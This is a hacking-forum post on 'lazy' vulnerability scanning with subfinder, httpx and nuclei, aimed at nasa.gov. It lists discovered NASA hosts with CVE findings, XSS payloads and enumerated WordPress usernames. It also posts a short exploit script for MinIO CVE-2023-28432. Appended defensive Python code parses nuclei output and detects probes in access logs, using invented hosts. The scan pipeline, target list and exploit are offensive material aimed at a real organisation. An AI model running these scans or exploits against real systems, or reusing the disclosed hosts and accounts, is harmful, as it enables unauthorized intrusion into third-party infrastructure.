
[nasa.gov] - The basics of lazy scanning

Prokhorenco
(L3) cache
User
Registered: 18.02.2023
Messages: 192
Reactions: 305
See [1] for vulnerability scanning tools. The point of lazy scanning is trying to find those juicy low-hanging fruits with minimal effort, typically by scanning IP ranges and vuln scanning the discovered IPs for critical vulns [2] [3] [4]. But if you want to do a more targeted vulnerability scan you could try [4] [5] [6]:
Bash:
subfinder -d nasa.gov -silent | httpx -silent | nuclei -t cves -silent
which will enumerate all subdomains and scan them for CVE vulnerabilities of a targeted domain.
[CVE-2022-2185] [http] [high] https://git.smce.nasa.gov/users/sign_in [6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424]
[CVE-2021-21087] [http] [medium] https://ossim.hq.nasa.gov/CFIDE/scripts/ajax/package/cfajax.js
[CVE-2005-4385] [http] [medium] https://labrow13-hybrid-test-apigw....alert(document.domain)</script>&searchstring2
[CVE-2023-28432] [http] [high] https://luna.minio.luna.nasa.gov/minio/bootstrap/v1/verify
[CVE-2021-20323] [http] [medium] https://auth.appdat.jsc.nasa.gov/auth/realms/master/clients-registrations/default
[CVE-2018-11784] [http] [medium] https://astrobiology.nasa.gov//interact.sh
[CVE-2022-40083] [http] [critical] https://astrobiology.nasa.gov//**************/..
[CVE-2022-1595] [http] [medium] https://aero.larc.nasa.gov/wp-login.php
[CVE-2022-1595] [http] [medium] https://ampb.larc.nasa.gov/wp-login.php
[CVE-2022-1595] [http] [medium] https://geo-cape.larc.nasa.gov/wp-login.php
[CVE-2022-1595] [http] [medium] https://gewex-srb.larc.nasa.gov/wp-login.php
[CVE-2022-1595] [http] [medium] https://lbpw.larc.nasa.gov/wp-login.php
[CVE-2022-1595] [http] [medium] https://science.larc.nasa.gov/wp-login.php
[CVE-2022-1595] [http] [medium] https://public.ksc.nasa.gov/wp-login.php
[CVE-2022-1595] [http] [medium] https://terra.gsfc.nasa.gov/wp-login.php
[CVE-2022-1595] [http] [medium] https://terra.nasa.gov/wp-login.php
[CVE-2021-3654] [http] [medium] https://astrobiology.nasa.gov//interact.sh//..
[CVE-2018-13380] [http] [medium] https://labrow13-hybrid-test-apigw....ssage?msg=&#<svg/onload=alert(1337)>;&title=x
[CVE-2018-13380] [http] [medium] https://labrow13-hybrid-test-apigw....?errmsg=ABABAB--><script>alert(1337)</script>
[CVE-2015-8349] [http] [medium] https://labrow13-hybrid-test-apigw....ment.domain)</script>&advType=btype&p=banlist
[CVE-2017-5487:usernames] [http] [medium] https://robotics.nasa.gov/wp-json/wp/v2/users/ [RAP,campanelli,dprice,eaguila1,rap,Campanelli,Eddie Aguilar]
You could improve this, as both subfinder and nuclei take in file lists: you could have a list of targeted domains and then do the same thing as seen above:
Bash:
subfinder -dL targets.txt -silent | httpx -silent | nuclei -t cves -silent

Before you try to hack anything always remember one thing: Hacking is illegal and for nerds ;)

[1] https://enlacehacktivista.org/index.php?title=Scanning_and_Recon#Vulnerability_scanners
[2] https://xss.pro/threads/84235
[3] https://xss.pro/threads/83551/#post-580922
[4] https://xss.pro/threads/83679
[5] https://github.com/projectdiscovery/subfinder
[6] https://github.com/projectdiscovery/nuclei
[7] https://github.com/projectdiscovery/httpx
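The nuclei lines above follow a fixed shape: `[template-id] [protocol] [severity] <matched-url>` with an optional trailing `[extracted values]` block (the `CVE-2017-5487:usernames` line is one). Whoever ends up holding such output, the scanner operator or the asset owner who has to patch, needs it grouped per host and ordered by severity rather than as a flat URL list. The parser and triage below is an added example, not code from the post or from the projectdiscovery tools; the sample output is constructed with invented hosts under example.test, reusing only template ids that appear in the thread.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit

# Constructed sample in nuclei's default line format. Hosts are invented;
# the template ids are ones the post above reports.
SAMPLE_OUTPUT = """\
[CVE-2022-1595] [http] [medium] https://blog.example.test/wp-login.php
[CVE-2022-1595] [http] [medium] https://docs.example.test/wp-login.php
[CVE-2023-28432] [http] [high] https://objstore.example.test/minio/bootstrap/v1/verify
[CVE-2022-40083] [http] [critical] https://www.example.test/static/
[CVE-2017-5487:usernames] [http] [medium] https://cms.example.test/wp-json/wp/v2/users/ [alice,bob]
scanner banner line that is not a finding
"""

# [template-id] [protocol] [severity] <matched-at> [optional comma-separated extracted values]
FINDING_RE = re.compile(
    r"^\[(?P<template>[^\]]+)\] \[(?P<proto>[^\]]+)\] \[(?P<sev>[^\]]+)\] "
    r"(?P<url>\S+)(?: \[(?P<extracted>[^\]]*)\])?$"
)

SEVERITY_RANK = {"critical": 4, "high": 3, "medium": 2, "low": 1, "info": 0}


def parse_findings(text):
    """Turn raw nuclei stdout into dicts; lines that do not match are skipped."""
    findings = []
    for line in text.splitlines():
        m = FINDING_RE.match(line.strip())
        if not m:
            continue
        url = m.group("url")
        extracted = m.group("extracted")
        findings.append({
            "template": m.group("template"),
            "protocol": m.group("proto"),
            "severity": m.group("sev").lower(),
            "host": urlsplit(url).hostname or "",
            "url": url,
            "extracted": extracted.split(",") if extracted else [],
        })
    return findings


def triage_by_host(findings):
    """One row per host, worst severity first, so the owner sees which
    systems need attention before the rest."""
    by_host = defaultdict(list)
    for f in findings:
        by_host[f["host"]].append(f)
    rows = []
    for host, fs in by_host.items():
        worst = max(fs, key=lambda f: SEVERITY_RANK.get(f["severity"], -1))
        rows.append({
            "host": host,
            "worst": worst["severity"],
            "templates": sorted({f["template"] for f in fs}),
            "count": len(fs),
        })
    rows.sort(key=lambda r: (-SEVERITY_RANK.get(r["worst"], -1), r["host"]))
    return rows


def template_counts(findings):
    """How often each template fired: a repeated id (the WordPress one here)
    usually points at one shared deployment that can be fixed once."""
    return Counter(f["template"] for f in findings)


if __name__ == "__main__":
    found = parse_findings(SAMPLE_OUTPUT)
    for row in triage_by_host(found):
        print(f'{row["worst"]:<9} {row["host"]:<25} {", ".join(row["templates"])}')
    print(template_counts(found).most_common(3))
```

Feed it real output with `nuclei ... -silent > findings.txt` and `parse_findings(open("findings.txt").read())`; the regex deliberately ignores anything that is not a finding line, so banner or progress output mixed into stdout does not break the parse.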

CVE-2023-28432

import requests

# Placeholders kept as posted: fill in the target host and port.
url = "http://<minio-server>:<port>/minio/verify"

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
}

response = requests.get(url, headers=headers)

if response.status_code == 200:
    print(response.content.decode('utf-8'))
else:
    print("Exploit failed!")
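On the defending side, the request shape that the nuclei run above reported for CVE-2023-28432 (a hit on `/minio/bootstrap/v1/verify`) is easy to pick out of a reverse-proxy access log: that path belongs to MinIO's node-to-node bootstrap API, so a call to it from outside the cluster's own address space is a probe, and a 2xx answer to such a call is the case to escalate. The detector below is an added example, not part of the post; it assumes a combined-format access log, that cluster nodes live in 10.0.0.0/8 or 192.168.0.0/16, and uses constructed log lines with made-up addresses and timestamps.

```python
import re
from ipaddress import ip_address, ip_network

# Path reported by the nuclei run earlier in the thread for CVE-2023-28432.
WATCHED_PATH = "/minio/bootstrap/v1/verify"
# Assumption for this example: MinIO peers live in these ranges; only they
# should ever talk to the bootstrap API.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]

# Constructed sample in nginx/Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:11:02:13 +0000] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 1342 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Mar/2024:11:02:20 +0000] "GET /minio/health/live HTTP/1.1" 200 0 "-" "kube-probe/1.27"
10.0.0.6 - - [10/Mar/2024:11:02:21 +0000] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 1342 "-" "MinIO (linux; amd64) minio-go/v7"
198.51.100.9 - - [10/Mar/2024:11:05:00 +0000] "POST /minio/bootstrap/v1/verify?x=1 HTTP/1.1" 403 0 "-" "curl/8.4.0"
this line is not a log entry
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r"(?P<status>\d{3}) (?P<size>\d+|-)"
)


def parse_log(text):
    """Parse combined-format lines; anything that does not match is dropped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["status"] = int(d["status"])
        d["path"] = d["target"].split("?", 1)[0]  # strip query string before matching
        entries.append(d)
    return entries


def is_internal(ip):
    try:
        addr = ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def find_bootstrap_probes(entries):
    """Flag external hits on the bootstrap endpoint.

    high - a 2xx answer went back to an external address (the response body is
           what the scan is after, so treat it as a probable disclosure)
    low  - the external request was rejected; a probe that got nothing
    Internal callers are expected peer traffic and are not flagged.
    """
    alerts = []
    for e in entries:
        if e["path"] != WATCHED_PATH or is_internal(e["ip"]):
            continue
        level = "high" if 200 <= e["status"] < 300 else "low"
        alerts.append({"ip": e["ip"], "ts": e["ts"], "status": e["status"],
                       "method": e["method"], "level": level})
    return alerts


if __name__ == "__main__":
    for a in find_bootstrap_probes(parse_log(SAMPLE_LOG)):
        print(f'{a["level"]:<5} {a["ip"]:<15} {a["method"]} {a["status"]} {a["ts"]}')
```

A "high" alert here is a sign to rotate the MinIO root credentials and check for follow-on logins, not just to block the source address; the fix itself is upgrading past the affected MinIO release.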